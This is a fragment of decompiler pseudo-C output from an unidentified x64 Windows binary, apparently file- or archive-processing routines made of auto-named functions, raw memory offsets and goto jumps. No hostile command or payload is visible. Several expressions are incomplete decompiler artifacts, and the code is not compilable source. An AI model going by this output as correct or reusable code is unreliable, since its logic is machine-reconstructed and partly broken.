				E00007FF67FF650B5D8F0(__r12,  *((intOrPtr*)(_t1294 + 0x70)),  *((intOrPtr*)(_t1294 + 0x70)));
				0x50b69b94();
				E00007FF67FF650B69B58(__r12, __r14);
				 *((long long*)(_t1298 + 0x68)) = __r12;
				if (__r12 == 0) goto 0x50b11f76;
				_t69 = _t1294 + 0x178; // 0xeaf8
				E00007FF67FF650B5D710(0x6438, __r12, __r12,  *((intOrPtr*)(_t1294 + 0x70)), __r12, _t69, _t1294);
				goto 0x50b11f79;
				 *((long long*)(_t1294 + 0x70)) = __r12;
				 *0x50b80550();
				E00007FF67FF650B62524( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x9518)),  *((intOrPtr*)(_t1294 + 0x60)),  *((intOrPtr*)(_t1294 + 0x70)));
				goto 0x50b11fde;
				_t1089 =  *((intOrPtr*)(_t1294 + 0x60));
				_t971 =  *(_t1089 + 0x10);
				if (_t971 - 0x100000 <= 0) goto 0x50b13163;
				 *(_t1089 + 0x10) = _t971 >> 1;
				if ( *0x50b80550() == 0) goto 0x50b11fbb;
				if ( *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10) ==  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10)) goto 0x50b12017;
				r8d = 0x6438;
				E00007FF67FF650B11144(0x29, _t685);
				 *0x50b80550();
				_t94 = _t1294 + 8; // 0xe988
				E00007FF67FF650B35F7C(_t94, _t1294, _t1296 + 0xb0b0, _t1296 + 0x20e0);
				r12d = 0;
				 *(_t1298 + 0x40) = r12b;
				 *(_t1298 + 0x58) = r12b;
				if ( *(_t1296 + 0x1302c) == r12b) goto 0x50b120a6;
				_t694 =  !=  ? 1 :  *(_t1298 + 0x41) & 0x000000ff;
				_t820 =  !=  ? 1 :  *(_t1298 + 0x41) & 0x000000ff;
				if (( !=  ? 1 :  *(_t1298 + 0x41) & 0x000000ff) == 0) goto 0x50b12083;
				 *((intOrPtr*)(_t1296 + 0xa090)) =  *((intOrPtr*)(_t1296 + 0xa090)) +  *((intOrPtr*)(_t1294 + 0x80));
				goto 0x50b12088;
				 *(_t1298 + 0x40) = dil;
				E00007FF67FF650B1C330( *((intOrPtr*)(_t1294 + 0x80)),  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10) >> 0x14, _t1296 + 0xb0b0);
				r8d = 0;
				_t554 = E00007FF67FF650B1A3A0( *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10) >> 0x14, _t1296 + 0xb0b0,  *((intOrPtr*)(_t1294 + 0x80)), _t1294);
				 *((long long*)(_t1296 + 0x28)) = __r12;
				 *((long long*)(_t1296 + 0x30)) = __r12;
				 *((long long*)(_t1296 + 0x38)) = __r12;
				 *((long long*)(_t1296 + 0x40)) = __r12;
				r14b = r12b;
				 *(_t1296 + 0x48) = r12b;
				 *((long long*)(_t1296 - 0x50)) = __r12;
				 *((long long*)(_t1298 + 0x60)) = __r12;
				if ( *((intOrPtr*)(_t1296 - 0x68)) - __r12 <= 0) goto 0x50b12e3d;
				E00007FF67FF650B166E0(_t554, _t1298 + 0x70, __r12);
				asm("movups xmm0, [eax]");
				asm("movaps [ebp-0x40], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movaps [ebp-0x30], xmm1");
				asm("movups xmm2, [eax+0x20]");
				asm("movaps [ebp-0x20], xmm2");
				asm("movups xmm0, [eax+0x30]");
				asm("movaps [ebp-0x10], xmm0");
				asm("movups xmm1, [eax+0x40]");
				asm("movaps [ebp], xmm1");
				asm("movups xmm0, [eax+0x50]");
				asm("movaps [ebp+0x10], xmm0");
				asm("psrldq xmm2, 0xc");
				asm("inc cx");
				 *(_t1296 - 0x14) = r15d;
				if (r15d == 0) goto 0x50b12e19;
				_t1059 =  *((intOrPtr*)(_t1296 - 0x20));
				_t1353 =  *((intOrPtr*)(_t1296 - 0x40));
				if (r15d == 6) goto 0x50b12d51;
				if (r15d == 5) goto 0x50b12d31;
				if (r15d == 4) goto 0x50b12bf6;
				E00007FF67FF650B36990(_t1059, _t1296 + 0x55f8, __r12, _t1294, _t1296 + 0xb0b0);
				 *((long long*)(_t1296 + 0x20a0)) = __r12;
				 *((long long*)(_t1296 + 0x20a8)) = __r12;
				 *((long long*)(_t1296 + 0x20b0)) = __r12;
				E00007FF67FF650B31C28(_t1296 + 0x50);
				_t1100 =  *((intOrPtr*)(_t1294 + 0x60));
				 *((char*)(_t1296 + 0x78)) =  *((intOrPtr*)(_t1100 + 0x8514));
				if ( *((intOrPtr*)(_t1296 + 0x19)) == r12b) goto 0x50b121cb;
				if ( *((intOrPtr*)(_t1296 + 0xa058)) != 3) goto 0x50b121cb;
				dil = 1;
				if ( *((intOrPtr*)(_t1100 + 0x71b9)) == r12b) goto 0x50b121d3;
				E00007FF67FF650B2E0E0( !=  ? 1 :  *(_t1298 + 0x41) & 0x000000ff, __r12, _t1059,  *((intOrPtr*)(_t1296 - 0x40)), _t1296 + 0x55f8, _t1294, _t1296 + 0xb0b0, _t1296 + 0x20e0);
				if ( *(_t1296 + 0x6710) == r12d) goto 0x50b121d0;
				goto 0x50b121d3;
				dil = r12b;
				_t695 =  *(_t1296 + 0x18);
				if (_t695 != 0) goto 0x50b121f1;
				if (dil == 0) goto 0x50b121ec;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x71b9)) != r12b) goto 0x50b121f1;
				r13b = r12b;
				goto 0x50b12208;
				r13b = 1;
				if (_t695 == 0) goto 0x50b12208;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x716c)) == 1) goto 0x50b129a0;
				_t983 =  *((intOrPtr*)(_t1294 + 0x60));
				if ( *((intOrPtr*)(_t983 + 0x8516)) != r12w) goto 0x50b12240;
				r8b =  *(_t983 + 0x71b9);
				r12b = E00007FF67FF650B3494C(_t983, _t1059,  *((intOrPtr*)(_t1296 - 0x40)), _t1296 + 0x1090);
				if ( *(_t1296 + 0x18) == dil) goto 0x50b12245;
				 *((long long*)(_t1296 + 0x20b0)) = _t1059;
				goto 0x50b12245;
				 *(_t1296 + 0x64) = 1;
				if (r13b != 0) goto 0x50b12404;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x8516)) != 0) goto 0x50b12404;
				if (r12b == 0) goto 0x50b1227f;
				asm("inc ebp");
				r8d = r8d & 0x00000004;
				E00007FF67FF650B321C0( *((intOrPtr*)(_t1294 + 0x60)), _t1059, _t1296 + 0x50,  *((intOrPtr*)(_t1296 - 0x40)));
				if ( *((long long*)(_t1296 + 0x58)) != 0xffffffff) goto 0x50b12358;
				_t1358 =  *((intOrPtr*)(_t1298 + 0x50));
				E00007FF67FF650B2CAB4( *((long long*)(_t1296 + 0x58)) - 0xffffffff, _t1059, 0x50ba7ab8, _t1358, _t1294,  *((intOrPtr*)(_t1296 - 0x40)));
				r12d = 0;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x8514)) == r12b) goto 0x50b122fe;
				E00007FF67FF650B31C28(_t1296 + 0x14080);
				asm("inc ebp");
				r8d = r8d & 0x00000004;
				if (E00007FF67FF650B321C0( *((intOrPtr*)(_t1294 + 0x60)), _t1059, _t1296 + 0x14080,  *((intOrPtr*)(_t1296 - 0x40))) == 0) goto 0x50b122f2;
				_t157 = _t1348 + 0x5f; // 0x5f
				E00007FF67FF650B111C0(_t157, _t1358);
				_t568 = E00007FF67FF650B31C70(_t1296 + 0x14080);
				_t987 =  *((intOrPtr*)(_t1296 - 0x38));
				 *((intOrPtr*)(_t1296 + 0xa090)) =  *((intOrPtr*)(_t1296 + 0xa090)) - _t987;
				E00007FF67FF650B166E0(_t568, _t1298 + 0x70,  *((intOrPtr*)(_t1298 + 0x60)));
				 *(_t987 + 0x2c) = r12d;
				r13d =  *(_t1298 + 0x44);
				r13d = r13d + 1;
				 *(_t1298 + 0x44) = r13d;
				if ( *_t1296 - __r12 <= 0) goto 0x50b129b3;
				if ( *((intOrPtr*)(_t1296 + 0xc)) != 0) goto 0x50b129b3;
				r15d = __r12 + 4;
				 *(_t1296 - 0x14) = r15d;
				 *(_t1294 + 0x78) = r12d;
				E00007FF67FF650B31C70(_t1296 + 0x50);
				goto 0x50b12134;
				if (r12b == 0) goto 0x50b1238d;
				_t988 =  *((intOrPtr*)(_t1296 + 0x20a0));
				 *(_t1296 - 0x28) = _t988;
				if (( *(_t1296 + 0x2098) & 0x00000400) == 0) goto 0x50b1238d;
				if ( *(_t1296 + 0x2090) != __r12) goto 0x50b1238d;
				E00007FF67FF650B320B8(_t1059, _t1296 + 0x50, _t1294);
				 *(_t1296 + 0x2090) = _t988;
				if ( *((intOrPtr*)(_t1296 + 0x19)) != dil) goto 0x50b12418;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x71ba)) == dil) goto 0x50b12418;
				if ( *((intOrPtr*)(_t1296 + 0xa058)) != 3) goto 0x50b12418;
				_t990 =  *((intOrPtr*)(_t1298 + 0x60));
				 *((long long*)(_t1296 + 0x20)) = _t990;
				if (E00007FF67FF650B15118(_t1059, _t1296 + 0x50, _t1296 + 0x28, _t1296 + 0x20) == 0) goto 0x50b12418;
				 *(_t1296 + 0x6710) = 4;
				E00007FF67FF650B166E0(_t572, _t1298 + 0x70,  *((intOrPtr*)(_t1296 + 0x20)));
				r9d = 0x800;
				_t1113 =  *((intOrPtr*)(_t1294 + 0x60));
				E00007FF67FF650B15820(E00007FF67FF650B15118(_t1059, _t1296 + 0x50, _t1296 + 0x28, _t1296 + 0x20), _t1059, _t1113, _t990, _t1294, _t1296 + 0x6714, _t1296 + 0x20);
				r13b = 1;
				goto 0x50b1247f;
				asm("dec eax");
				 *(_t1296 + 0x2090) =  *(_t1296 + 0x2090) & _t1113;
				if (r13b != 0) goto 0x50b1247f;
				if ( *((intOrPtr*)(_t1296 + 0x10)) == 0xffffffff) goto 0x50b1247d;
				if ( *((long long*)(_t1296 + 0x58)) == 0xffffffff) goto 0x50b12432;
				_t578 = E00007FF67FF650B166E0(E00007FF67FF650B31CF0(_t1059, _t1296 + 0x50), _t1298 + 0x70,  *((intOrPtr*)(_t1296 + 0x10)));
				if ( *((intOrPtr*)(_t990 + 0x2c)) - 2 - 1 > 0) goto 0x50b1247d;
				 *(_t1296 + 0x6710) = 5;
				E00007FF67FF650B166E0(_t578, _t1298 + 0x70,  *((intOrPtr*)(_t1296 + 0x10)));
				r9d = 0x800;
				E00007FF67FF650B15820( *((intOrPtr*)(_t990 + 0x2c)) - 2 - 1, _t1059,  *((intOrPtr*)(_t1294 + 0x60)), _t990, _t1294, _t1296 + 0x6714, _t1296 + 0x20);
				r13b = 1;
				E00007FF67FF650B37F90(1, _t775, _t990, _t1059, 0x50ba7a90, _t1353, _t1296 + 0x20);
				r9d = 0x800;
				E00007FF67FF650B15820( *((intOrPtr*)(_t990 + 0x2c)) - 2 - 1, _t1059,  *((intOrPtr*)(_t1294 + 0x60)), _t1296 - 0x40, _t1294, _t1296 + 0x5620, _t1296 + 0x20);
				if ( *(_t1298 + 0x58) == dil) goto 0x50b12533;
				E00007FF67FF650B1A430(_t1296 + 0xb0b0);
				E00007FF67FF650B1C330(_t990, _t1059, _t1296 + 0xb0b0);
				r8d = 0;
				E00007FF67FF650B1A3A0(_t1059, _t1296 + 0xb0b0, _t990, _t1294);
				 *(_t1298 + 0x20) = 0;
				E00007FF67FF650B15F6C( *((intOrPtr*)(_t990 + 0x2c)) - 2,  *(_t1298 + 0x58) - dil, _t1059, _t1294, _t1296 + 0xb0b0, _t990, _t1294, _t990,  *((intOrPtr*)(_t1294 + 0x70)), __r10, _t1347);
				_t1339 =  *((intOrPtr*)(_t1294 + 0x68));
				r8d =  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x7144);
				r8d = r8d - 1;
				 *0x50b80550();
				r9d = 1;
				 *(_t1294 + 0x8c) = r9b;
				goto 0x50b12539;
				r9d = 1;
				 *(_t1298 + 0x58) = dil;
				 *(_t1298 + 0x40) = dil;
				if ( *((intOrPtr*)(_t1296 + 0xa05c)) == dil) goto 0x50b1265d;
				r14d = dil & 0xffffffff;
				_t993 =  *((intOrPtr*)(_t1294 + 0x60));
				r8d =  *(_t993 + 0x715c);
				if ((r8b & 0x00000002) == 0) goto 0x50b12580;
				if ( *((intOrPtr*)(_t993 + 0x7160)) <= 0) goto 0x50b12580;
				if ( *((intOrPtr*)(_t1298 + 0x48)) <= 0) goto 0x50b12580;
				asm("cdq");
				r14d =  ==  ? r9d : r14d;
				if ((r8b & 0x00000004) == 0) goto 0x50b125d8;
				E00007FF67FF650B44330(_t993, _t1296 + 0x5620);
				_t1285 = _t993;
				if (_t993 == 0) goto 0x50b125cf;
				0x50b5a360();
				r14d = r14b & 0xffffffff;
				r14d =  !=  ? 1 : r14d;
				_t239 = _t993 + 0x3f; // 0x40
				r8d = _t239;
				E00007FF67FF650B5A390(_t1296 + 0x150c0, _t1285, _t990);
				goto 0x50b125d8;
				 *((short*)(_t1296 + 0x150c0)) = 0;
				r9d =  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x715c);
				_t865 = r9b & 0x00000008;
				if (_t865 != 0) goto 0x50b12622;
				_t995 = _t1296 + 0x15140;
				_t702 =  *(_t995 + _t1296 + 0x211a - _t995) & 0x0000ffff;
				if (_t865 != 0) goto 0x50b1260e;
				if (_t702 != 0) goto 0x50b125fa;
				if (( *_t995 & 0x0000ffff) - _t702 == 0) goto 0x50b12622;
				if ((r9b & 0x00000010) != 0) goto 0x50b12627;
				if ( *((long long*)(_t1296 - 0x50)) - 0x400000 > 0) goto 0x50b12627;
				if (r14b == 0) goto 0x50b1264b;
				if ( *((intOrPtr*)(_t1298 + 0x48)) <= 0) goto 0x50b1264b;
				 *0x50b80550();
				 *(_t1294 + 0x8c) = dil;
				 *((long long*)(_t1296 - 0x50)) = _t1285;
				goto 0x50b12659;
				_t1287 =  *((intOrPtr*)(_t1296 - 0x50)) +  *((intOrPtr*)(_t1296 - 0x38));
				 *((long long*)(_t1296 - 0x50)) = _t1287;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t1296 + 0x15140, _t1296 + 0x211a, _t1296 + 0x211a - _t995);
				r8b = r15d == 3;
				 *(_t1298 + 0x28) =  *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x7157));
				 *(_t1298 + 0x20) = dil;
				r9d = 0;
				_t267 = _t1339 + 1; // 0x1
				r14d = _t267;
				E00007FF67FF650B5CFB8(( *_t995 & 0x0000ffff) - _t702, 0,  *((intOrPtr*)(_t1294 + 0x60)), _t1296 + 0x15140,  *((intOrPtr*)(_t1296 - 0x40)), _t1294, _t1296);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x8516)) != 0) goto 0x50b126c2;
				if ( *((intOrPtr*)(_t1296 + 0x20a0)) == _t1287) goto 0x50b126c2;
				goto 0x50b126e1;
				 *(_t1296 + 0x2090) = 0x7fffffff;
				 *(_t1296 + 0x6709) = r14b;
				 *(_t1296 + 0x66a2) = r14b;
				 *(_t1296 + 0x55fc) = 2;
				 *((long long*)(_t1296 + 0x6668)) = 0x7fffffff;
				 *((long long*)(_t1296 + 0x6660)) = _t1287;
				if ( *((intOrPtr*)(_t1296 + 0xa058)) != 3) goto 0x50b1270a;
				goto 0x50b1270f;
				E00007FF67FF650B36770(2, _t1296 + 0x6678,  *((intOrPtr*)(_t1296 - 0x40)));
				_t1002 =  *((intOrPtr*)(_t1294 + 0x60));
				r15d = 0;
				r14b =  *(_t1296 + 0x18);
				if ( *((intOrPtr*)(_t1002 + 0x6130)) == r15b) goto 0x50b127a3;
				if (r14b != 0) goto 0x50b127a3;
				if ( *((intOrPtr*)(_t1296 + 0xa058)) != 3) goto 0x50b12781;
				E00007FF67FF650B29B14(_t1059, _t1296 + 0x66b9, _t1002, _t1294, _t1296 + 0x211a - _t995);
				 *((intOrPtr*)(_t1296 + 0x66f4)) = 0xf;
				_t288 = _t1358 + 1; // 0x1
				 *((char*)(_t1296 + 0x66c9)) = _t288;
				 *((char*)(_t1296 + 0x66d2)) =  *((intOrPtr*)(_t1296 + 0xa064)) == r15b;
				goto 0x50b12786;
				 *((char*)(_t1296 + 0x66a3)) = 1;
				 *((char*)(_t1296 + 0x66a8)) = 1;
				asm("movups xmm0, [ebp+0xa072]");
				asm("movdqu [ebp+0x66a9], xmm0");
				goto 0x50b127a9;
				_t297 = _t1002 + 0x15; // 0x32
				r8d = _t297;
				_t602 =  ==  ? r8d : 0x1d;
				 *((intOrPtr*)(_t1296 + 0x5614)) =  ==  ? r8d : 0x1d;
				 *((long long*)(_t1296 + 0x6700)) =  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10);
				 *(_t1296 + 0x66f9) = r15b;
				r8d = 1;
				_t604 =  !=  ? r8d :  *(_t1296 + 0x66f8) & 0x000000ff;
				 *(_t1296 + 0x66f8) =  !=  ? r8d :  *(_t1296 + 0x66f8) & 0x000000ff;
				if (r12b == 0) goto 0x50b12823;
				 *((long long*)(_t1296 + 0x6648)) =  *((intOrPtr*)(_t1296 + 0x20a0));
				 *((long long*)(_t1296 + 0x6658)) =  *((intOrPtr*)(_t1296 + 0x20b0));
				_t1006 =  *((intOrPtr*)(_t1296 + 0x20a8));
				 *((long long*)(_t1296 + 0x6650)) = _t1006;
				r12d = 0;
				goto 0x50b1284a;
				E00007FF67FF650B5B9D8(_t1296 + 0x6648);
				r12d = 0;
				 *((long long*)(_t1296 + 0x6658)) = __r12;
				 *((long long*)(_t1296 + 0x6650)) = __r12;
				_t1250 =  *((intOrPtr*)(_t1294 + 0x60));
				_t707 =  *((intOrPtr*)(_t1296 + 0xa058));
				_t606 =  *((intOrPtr*)(_t1296 - 0x30));
				 *((intOrPtr*)(_t1296 + 0x561c)) = _t606;
				if (_t707 == 2) goto 0x50b12861;
				if ( *(_t1296 + 0x6710) != r12d) goto 0x50b1286b;
				asm("btr eax, 0xa");
				 *((intOrPtr*)(_t1296 + 0x561c)) = _t606;
				 *(_t1296 + 0x66f9) = r14b;
				 *(_t1296 + 0x5618) =  *((intOrPtr*)(_t1250 + 0x7144));
				if ( *((intOrPtr*)(_t1296 + 0x6668)) - _t1006 > 0) goto 0x50b12891;
				if (_t707 != 3) goto 0x50b128a0;
				r15d = 1;
				 *(_t1296 + 0x6709) = r15b;
				goto 0x50b128a6;
				r15d = 1;
				_t325 = _t1294 + 0x300; // 0xec80
				r8d =  *(_t1250 + 0x9518);
				E00007FF67FF650B366EC(2, _t1059, _t325, _t1294, __r10, _t1347);
				 *(_t1296 + 0x670c) = r12d;
				_t328 = _t1294 + 0x178; // 0xeaf8
				E00007FF67FF650B49BBC(_t1006, _t328, _t1296 + 0x50, _t1296 + 0x20e0);
				 *(_t1294 + 0x228) = r15b;
				 *((long long*)(_t1294 + 0x290)) = __r12;
				 *((long long*)(_t1296 + 0x6670)) =  *(_t1296 + 0x2090);
				if (r13b != 0) goto 0x50b12a15;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x8516)) != r12w) goto 0x50b12a15;
				E00007FF67FF650B49A54( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x8516)) - r12w, _t1059, _t328, _t1298 + 0x68,  *(_t1296 + 0x2090), _t1294, _t1298 + 0x41, _t1298 + 0x42, _t328);
				if ( *(_t1298 + 0x41) == r12b) goto 0x50b129c1;
				_t1356 =  *((intOrPtr*)(_t1296 - 0x40));
				_t612 = E00007FF67FF650B2CAB4( *(_t1298 + 0x41) - r12b, _t1059, 0x50ba7ab8,  *((intOrPtr*)(_t1298 + 0x50)), _t1294, _t1356);
				_t1008 =  *((intOrPtr*)(_t1296 - 0x38));
				 *((intOrPtr*)(_t1296 + 0xa090)) =  *((intOrPtr*)(_t1296 + 0xa090)) - _t1008;
				_t1254 =  *((intOrPtr*)(_t1298 + 0x60));
				E00007FF67FF650B166E0(_t612, _t1298 + 0x70, _t1254);
				 *(_t1008 + 0x2c) = r12d;
				r13d =  *(_t1298 + 0x44);
				r13d = r13d + 1;
				 *(_t1298 + 0x44) = r13d;
				if ( *_t1296 - __r12 <= 0) goto 0x50b129b3;
				r15d = 4;
				 *(_t1296 - 0x14) = r15d;
				 *(_t1294 + 0x78) = r12d;
				E00007FF67FF650B31C70(_t1296 + 0x50);
				goto 0x50b12131;
				E00007FF67FF650B31C70(_t1296 + 0x50);
				r13d =  *(_t1298 + 0x44);
				goto 0x50b12e19;
				E00007FF67FF650B31C70(_t1296 + 0x50);
				goto 0x50b12e1e;
				if ( *((intOrPtr*)(_t1298 + 0x42)) == r12b) goto 0x50b129dd;
				r8b =  *(_t1296 + 0x2090) -  *((intOrPtr*)(_t1298 + 0x68)) > 0;
				goto 0x50b129ee;
				_t1290 =  *((intOrPtr*)(_t1298 + 0x68));
				 *(_t1296 + 0x2090) = _t1290;
				r8d = 0;
				E00007FF67FF650B14074(0, _t1290);
				 *((long long*)(_t1296 + 0x6670)) = _t1008;
				_t1320 = _t1008;
				_t1009 =  *((intOrPtr*)(_t1296 + 0x6668));
				_t1010 =  >  ? _t1320 : _t1009;
				 *((long long*)(_t1296 + 0x6668)) =  >  ? _t1320 : _t1009;
				 *((intOrPtr*)(_t1298 + 0x48)) =  *((intOrPtr*)(_t1298 + 0x48)) + r15d;
				if ( *((intOrPtr*)(_t1296 + 0xa058)) != 3) goto 0x50b12a62;
				_t368 = _t1320 - 0x400; // -1024
				_t1145 =  >  ? _t368 : __r12;
				_t1014 =  <  ? _t1290 : (_t1254 >> 3) + (_t1254 >> 3) * 8;
				_t1015 =  >  ? _t1320 : _t1014;
				 *((long long*)(_t1294 + 0x2c0)) =  >  ? _t1320 : _t1014;
				if (( *(_t1296 + 8) & r15b) != 0) goto 0x50b12a78;
				if ( *( *((intOrPtr*)(_t1294 + 0x60)) + 0x7144) != r12d) goto 0x50b12a7b;
				_t687 = r15b;
				if (r13b != 0) goto 0x50b12a84;
				if (_t687 == 0) goto 0x50b12ab7;
				 *(_t1296 + 0x5618) = r12b;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x6130)) != r12b) goto 0x50b12ab3;
				_t620 =  !=  ? 0x14 :  *((intOrPtr*)(_t1296 + 0x5614));
				 *((intOrPtr*)(_t1296 + 0x5614)) =  !=  ? 0x14 :  *((intOrPtr*)(_t1296 + 0x5614));
				if (_t687 != 0) goto 0x50b12ad9;
				 *0x50b80550();
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x68)))) + 0x38)) +  *((intOrPtr*)(_t1296 + 0x6668)) - 0x8000 <= 0) goto 0x50b12aea;
				 *0x50b80550();
				 *(_t1298 + 0x28) = r13b;
				 *(_t1298 + 0x20) = r15b;
				_t397 = _t1294 + 8; // 0xe988
				_t1349 = _t397;
				E00007FF67FF650B35FB8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x68)))) + 0x38)) +  *((intOrPtr*)(_t1296 + 0x6668)) - 0x8000, _t1059, _t1349, _t1296 + 0x50, _t1294,  *((intOrPtr*)(_t1294 + 0x68)),  *((intOrPtr*)(_t1296 - 0x40)), __r10, _t1347);
				if (r13b != 0) goto 0x50b12b3d;
				if (_t687 == 0) goto 0x50b12bab;
				E00007FF67FF650B360E8(0, _t1059, _t1349, _t1296 + 0x50, _t1290, _t1294);
				E00007FF67FF650B1621C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x68)))) + 0x28)), _t1356);
				E00007FF67FF650B35FAC(E00007FF67FF650B35AD0(0, _t1059, _t1349, _t1290, _t1294, _t1296,  *((intOrPtr*)(_t1294 + 0x68)),  *((intOrPtr*)(_t1296 - 0x40)), _t1345, _t1347), _t1349);
				r12d = 0;
				if ( *((intOrPtr*)(_t1296 + 0xa05c)) != r12b) goto 0x50b12b5a;
				 *0x50b80550();
				E00007FF67FF650B5B008();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x7157)) != r12b) goto 0x50b12ba2;
				E00007FF67FF650B54598(0xd26, 2, _t1059, _t1294, _t1296,  *((intOrPtr*)(_t1294 + 0x68)));
				_t1258 =  !=  ? 0x50b809bc : 0x50b80a60;
				E00007FF67FF650B283F0(L"%s%s ",  !=  ? 0x50b809bc : 0x50b80a60,  *((intOrPtr*)(_t1294 + 0x60)),  *((intOrPtr*)(_t1296 - 0x40)));
				 *((long long*)(_t1294 + 0x38)) = _t1349;
				goto 0x50b129a0;
				_t1346 =  *((intOrPtr*)(_t1294 + 0x68));
				r8d =  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x7144);
				r8d = r8d - r15d;
				 *0x50b80550();
				r12d = 0;
				if ( *((intOrPtr*)(_t1296 + 0xa05c)) == r12b) goto 0x50b12b49;
				 *(_t1294 + 0x8c) = r15b;
				goto 0x50b12b40;
				if ( *(_t1296 + 0x1302c) == r12b) goto 0x50b12c53;
				if ( *(_t1298 + 0x40) != 0) goto 0x50b12c53;
				 *(_t1298 + 0x20) = r12b;
				E00007FF67FF650B15F6C(0xd26,  *(_t1298 + 0x40), _t1059, _t1294, _t1296 + 0xb0b0, _t1290, _t1294,  *_t1296,  *((intOrPtr*)(_t1294 + 0x70)),  *((intOrPtr*)(_t1294 + 0x68)), _t1347);
				 *(_t1298 + 0x30) = 2;
				 *(_t1298 + 0x28) = r12b;
				 *(_t1298 + 0x20) =  *((intOrPtr*)(_t1294 + 0x70));
				_t1344 =  *((intOrPtr*)(_t1294 + 0x68));
				E00007FF67FF650B15A44(0xd26, _t1059, _t1294, _t1296 + 0xb0b0, _t1294, _t1296 + 0x20e0,  *((intOrPtr*)(_t1294 + 0x68)),  *((intOrPtr*)(_t1294 + 0x68)), _t1347);
				goto 0x50b12d27;
				 *0x50b80550();
				r8d = 0;
				E00007FF67FF650B1A3A0(_t1059, _t1296 + 0xb0b0,  *_t1296, _t1294);
				E00007FF67FF650B1E5A8(_t1296 + 0xb0b0, _t1290, _t1294);
				E00007FF67FF650B36924( *(_t1298 + 0x40),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x68)))) + 0x28)), _t1059, _t1296 + 0x55f8, _t1296 + 0xe5c8, _t1294, _t1296 + 0x20e0);
				if (2 == 0) goto 0x50b12cac;
				r8d = 2;
				E00007FF67FF650B15EB0(_t1059, _t1294, _t1296 + 0x55f8);
				E00007FF67FF650B1C374(_t1296 + 0xb0b0);
				r12d =  *(_t1298 + 0x58);
				r12d = r12b & 0xffffffff;
				r12d =  ==  ?  *(_t1296 + 0x1302c) & 0x000000ff : r12d;
				 *(_t1298 + 0x58) = r12d;
				if (r12b == 0) goto 0x50b12cf5;
				_t1034 =  >  ?  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10) :  *((intOrPtr*)(_t1296 + 0x6700));
				 *((long long*)(_t1296 + 0x6700)) =  >  ?  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10) :  *((intOrPtr*)(_t1296 + 0x6700));
				r12d = 0;
				 *(_t1298 + 0x20) = r12b;
				r9d = 0;
				r8d = 0;
				_t442 = _t1349 + 2; // 0x2
				E00007FF67FF650B1B4D8(_t442,  >  ?  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10) :  *((intOrPtr*)(_t1296 + 0x6700)), _t1296 + 0x20e0, _t1296 + 0x55f8, _t1296 + 0x20e0,  *((intOrPtr*)(_t1294 + 0x68)), _t1347);
				E00007FF67FF650B182C8(_t1059, _t1296 + 0x20e0, _t1296 + 0xb0b0,  *((intOrPtr*)(_t1294 + 0x68)));
				E00007FF67FF650B5B008();
				goto 0x50b12e19;
				if (_t1356 == 0) goto 0x50b12d4b;
				E00007FF67FF650B54598(0xd9e, 2, _t1059, _t1294, _t1296, _t1296 + 0x20e0);
				E00007FF67FF650B283F0( >  ?  *( *((intOrPtr*)(_t1294 + 0x60)) + 0x10) :  *((intOrPtr*)(_t1296 + 0x6700)), _t1356, _t1296 + 0x20e0,  *((intOrPtr*)(_t1294 + 0x68)));
				 *((intOrPtr*)(_t1298 + 0x5c)) =  *((intOrPtr*)(_t1298 + 0x5c)) + 1;
				goto 0x50b12d27;
				 *0x50b80550();
				r8d = 0;
				_t1266 =  *_t1296;
				E00007FF67FF650B1A3A0(_t1059, _t1296 + 0xb0b0, _t1266, _t1294);
				E00007FF67FF650B1E5A8(_t1296 + 0xb0b0, _t1290, _t1294);
				if (_t1266 - 2 - 1 <= 0) goto 0x50b12dc7;
				if ( *((intOrPtr*)(_t1296 + 0x13034)) !=  *((intOrPtr*)(_t1296 + 0xa064))) goto 0x50b12e19;
				r8d = 0;
				E00007FF67FF650B1A3A0(_t1059, _t1296 + 0xb0b0,  *((intOrPtr*)(_t1296 + 0x13018)), _t1294);
				goto 0x50b12e06;
				_t1037 = _t1296 + 0x10930;
				_t1328 =  !=  ? _t1296 + 0x10930 : _t1296 + 0xe5c8;
				 *(_t1298 + 0x20) = r12b;
				r9d = 0;
				E00007FF67FF650B1B4D8( *((intOrPtr*)(_t1296 + 0xd39c)), _t1296 + 0x10930, _t1296 + 0x20e0,  *((intOrPtr*)(_t1296 + 0x13018)),  !=  ? _t1296 + 0x10930 : _t1296 + 0xe5c8,  *((intOrPtr*)(_t1294 + 0x68)), _t1347);
				E00007FF67FF650B1A430(_t1296 + 0xb0b0);
				E00007FF67FF650B31D58(_t1296 + 0x10930, _t1059, _t1296 + 0xb0b0, _t1296 + 0x20e0, _t1296,  *((intOrPtr*)(_t1296 + 0x13020)) - _t1037);
				_t1039 =  *((intOrPtr*)(_t1298 + 0x60)) + 1;
